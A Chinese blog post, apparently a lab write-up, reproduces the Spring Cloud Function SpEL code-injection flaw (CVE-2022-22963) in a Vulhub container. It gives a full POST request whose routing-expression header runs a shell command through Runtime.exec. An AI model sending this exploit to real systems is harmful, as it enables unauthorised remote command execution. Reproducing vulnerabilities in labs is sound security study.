Spring Cloud Function SpEL 代码注入(CVE-2022-22963)漏洞复现

本文介绍如何复现Spring Cloud Function SpEL代码注入漏洞(CVE-2022-22963),通过搭建Vulhub环境并发送恶意构造的POST请求来触发漏洞,最终实现远程命令执行。

Spring Cloud Function SpEL 代码注入 (CVE-2022-22963)漏洞复现

一、复现环境

Vulhub:https://github.com/vulhub/vulhub/tree/master/spring/CVE-2022-22963

二、复现过程

  1. 拉取docker环境
    在这里插入图片描述
    服务启动后,可通过地址:http://your-ip:8080 查看。
  2. 攻击载荷

使用bp回放Send有效载荷(请求方法为POST)

POST /functionRouter HTTP/1.1
Host: localhost:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("touch /tmp/success")
Content-Type: text/plain
Content-Length: 4

test

进入容器可查看命令成功执行:

在这里插入图片描述

评论 1
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值